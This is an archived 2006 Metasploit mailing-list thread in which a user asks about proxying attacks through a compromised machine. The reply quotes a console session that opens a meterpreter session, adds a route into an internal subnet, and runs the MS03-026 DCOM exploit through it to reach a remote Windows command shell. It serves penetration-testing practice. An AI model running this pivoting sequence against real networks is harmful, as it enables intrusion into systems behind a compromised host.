Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

staging attack proxy

From: cbyrd01 at gmail.com (Chris Byrd)
Date: Fri, 10 Nov 2006 10:03:24 -0600
What you are looking for is the meterpreter payload.  Once a system
has meterpreter on it, you should be able to route future exploits
through it using the route command.  Here's a sample previously posted
by mmiller:

msf exploit(aggressive) > exploit -z
[*] Started reverse handler
[*] Sending 239 byte payload...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.142.43.3:5555 -> 10.142.43.2:3008)
[*] Session 1 created in the background.
msf exploit(aggressive) > route add 192.168.37.0 255.255.255.0 1
msf exploit(aggressive) > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (10.142.43.3:5555 -> 10.142.43.2:3011)
[*] The DCERPC service did not reply to our request

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

I've had problems getting this to work myself, but I haven't tried it
with the more recent versions.  If you try it out, please let me know
(or post on list) as to your results.

Thanks!

Chris

On 11/10/06, Valter Santos <vsantola at gmail.com> wrote:

Folks,

is there any support for staging attack proxies on metasploit (v2.7 or
v3.0), searching the docs I don't see anything.

What I want to mean with this is if it is possible to upload a
"metasploit agent" to a compromised system and proxy attack through it
 (much in the terms of level1 agents on core impact). I think i read
something about this for metasploit, but cannot find any info.

cheers,
/valter

--
o Valter Santos
o Security Analyst
o INFOCON Tactical Overview: http://infocon.sectoid.com
o PGP: 0xE2A4B206
o ..
o Attack is the secret of defense; defense is the planning of an attack.
o Sun Tzu, Art of War
Previous By Date Next
Previous By Thread Next

Current thread: